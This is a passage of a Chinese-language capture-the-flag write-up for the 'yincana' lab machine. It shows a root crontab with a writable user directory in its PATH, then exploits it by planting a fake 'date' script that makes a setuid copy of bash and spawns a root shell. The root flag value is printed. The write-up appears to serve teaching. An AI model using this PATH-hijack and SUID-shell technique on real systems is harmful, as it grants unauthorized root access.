manel@yincana:/var/www/html$ cat chat.html
……………………省略………………
<div class="message user-File">
<strong>File:</strong>
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.O28Ghj/crontab installed on Sun Jun  2 06:41:22 2024)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
PATH=/home/manel/.local/bin:/usr/bin:/bin:/usr/local/bin
MAILTO=""
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
* * * * * /bin/bash -c '/usr/bin/xsltproc --stringparam current-date "`date`" -o /var/www/html/chat.html /root/chat.xsl /home/mensajes.xml &gt;&gt; /tmp/test.log'
0 0 1 1 * chatbackup

</div>
</div></body>
</html>

`PATH`劫持

巧了，这个crontab中设置的PATH中存在/home/manel/.local/bin

这不就是当前用户的家目录下吗

参考Linux 权限提升 - HackTricks

利用一下，切换到/home/manel/.local/bin目录下

1
2
3

manel@yincana:~/.local/bin$ vi date
cp /bin/bash /tmp/bash; chmod +s /tmp/bash
manel@yincana:~/.local/bin$ chmod +x date

看一下/tmp，正常提权即可

manel@yincana:~/.local/bin$ cd /tmp/
manel@yincana:/tmp$ ls -al bash
-rwsr-sr-x 1 root root 1265648 mar  3 15:11 bash
manel@yincana:/tmp$ ./bash -p
bash-5.2# id
uid=1000(manel) gid=1000(manel) euid=0(root) egid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1000(manel),1051(backupchat)
bash-5.2# whoami
root
bash-5.2# cat /root/root.txt
11d39f0204cd2e6ba4ab9dd7b99fafe6
-- Congratulations!
Give some flowers to celebrate now, don't waste a moment.
-- Felicidades!
Regala unas flores para celebrarlo ahora mismo, no pierdas ni un momento.
-- Felicitats!
Regala unes flors per celebrar-ho ara mateix, no perdis ni un moment.

后记

感谢Lenam作者为我们带来这么精彩的靶机

信息收集

服务探测

SSRF

Iframe利用

LFI文件包含